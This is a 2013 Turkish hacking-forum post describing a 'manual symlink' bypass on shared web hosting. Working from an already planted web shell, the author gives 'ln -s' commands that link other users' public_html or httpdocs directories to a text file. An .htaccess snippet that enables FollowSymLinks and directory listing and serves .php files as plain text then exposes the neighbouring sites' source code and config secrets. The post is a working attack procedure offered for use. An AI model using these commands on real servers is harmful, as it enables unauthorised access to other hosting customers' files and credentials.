THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Server Kök Dizin Bypass | Manual Symlink 2013 | THT

S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
30-10-2013 20:29
#1
Server Kök Dizin Bypass | Manual Symlink 2013 | THT

Shellerdeki sym bir klasor oluşturur ve oraya çekmeye çalışır dosyayı sunucuda yazma izni olmadığı için işlem yapamazsınız ama bu sistemin çok basit bir yöntemi var

ilk olarak run command ( komut yedirebildiğimi shell veya cgi telnet te olabilir )

Run command sistemini açıyoruz

1.Kod Linux Public_html ;

Kod:
"ln -s /home/çekmekistediğimizdizin/public_html/ asd.txt"
2.Kod Linux Httpdocs ;

Kod:
"ln -s /home/çekmekistediğinizdizin/httpdocs/ asd.txt"
Şeklinde yazıyoruz ve enterlıyoruz

Çektiğimiz dizin asd.txt olarak gelicektir. açmaya çalıştığınızda 403 forbidden hatası ile karşılaşıcaksınız.

Şimdi ise asd.txt nin olduğu yere .htaccess dosyası atıyoruz

.htaccess kodları ;

Kod:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
bu kadar f5 çekmeniz yeterli dizinler karşımıza gelicektir.

Not ;bu htaccessi ana dizine asla atmayın shellinizin olduğu dizinede atmayın yoksa site down


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler